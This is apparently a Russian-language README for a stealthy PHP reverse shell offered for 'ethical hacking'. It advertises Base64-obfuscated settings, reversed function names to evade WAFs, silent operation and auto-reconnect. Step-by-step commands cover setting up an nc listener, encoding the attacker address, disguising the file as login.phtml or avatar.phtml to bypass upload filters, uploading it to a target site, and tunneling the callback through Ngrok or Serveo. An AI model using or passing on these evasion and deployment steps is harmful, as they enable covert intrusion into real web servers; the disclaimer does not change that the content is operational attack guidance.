
Это мощный и скрытный PHP-reverse shell, предназначенный для этичного хакинга и тестирования на проникновение. Он устанавливает надежное и тихое соединение обратно с вашей машиной.
Это мощная и скрытная PHP-обратная оболочка, предназначенная для этичного взлома и тестирования на проникновение. Она устанавливает надёжное и незаметное соединение обратно с вашей машиной.
Данная PHP-обратная оболочка разработана строго для образовательных целей и авторизованного тестирования на проникновение.
Разработчик не несёт ответственности за любое неправомерное использование, ущерб или незаконную деятельность, осуществлённую с помощью этого reverse_shell.
Используйте ответственно и только в системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Несанкционированный доступ незаконен и наказуем по закону.
IP-адрес и команда оболочки закодированы в Base64 для скрытности
Имена функций перевёрнуты для обхода WAF и фильтров безопасности
Тихий режим — никакого вывода для обнаружения
Автоматическое переподключение при обрыве соединения
Может работать как фоновый демон (если сервер это поддерживает)
Работает на большинстве серверов с поддержкой PHP
Поддерживает туннельные сервисы, такие как Ngrok, Serveo
Загружайте с расширением .phtml для обхода некоторых фильтров
1. Запустите слушатель на вашей машине
nc -lvnp 4444
2. Закодируйте ваш IP или имя хоста в Base64
Используйте простую команду:
echo "your_ip_or_hostname" | base64
Пример:
echo "192.168.1.5" | base64
Скопируйте результат и замените значение $ip_b64 в скрипте PHP-обратной оболочки.
3. Обновите ваш скрипт PHP-обратной оболочки:
Измените эти строки, указав ваш IP/имя хоста в Base64 и порт:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. Переименуйте файл и загрузите
Переименуйте файл во что-то менее подозрительное, например:
login.phtml
avatar.phtml
update.phtml
Использование расширения .phtml помогает файлу выполняться на некоторых серверах, которые блокируют .php.
Загрузите этот файл на целевой сайт, где разрешена загрузка файлов.
5. Активируйте обратную оболочку
Откройте загруженный файл в браузере:
http://target.com/uploads/login.phtml
После открытия ваш слушатель получит соединение обратной оболочки.
Если вы используете мобильные данные или находитесь за роутером (NAT), ваш IP может не быть публичным. В таком случае обратная оболочка не сможет напрямую добраться до вашей машины.
Чтобы это исправить, используйте инструменты TCP-туннелирования, такие как Ngrok или Serveo.
Установите Ngrok
Запустите эту команду:
ngrok tcp 4444
Она покажет что-то вроде:
Forwarding tcp://4.tcp.ngrok.io:18900
Обновите ваш скрипт PHP-обратной оболочки:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
Запустите ваш слушатель:
nc -lvnp 4444
Запустите эту команду:
ssh -R 0:localhost:4444 serveo.net
Он скажет что-то вроде:
Forwarding TCP connections from serveo.net:46603
Обновите ваш скрипт PHP-обратной оболочки:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
Запустите ваш слушатель:
nc -lvnp 4444
Этот проект лицензирован под GNU General Public License v3.0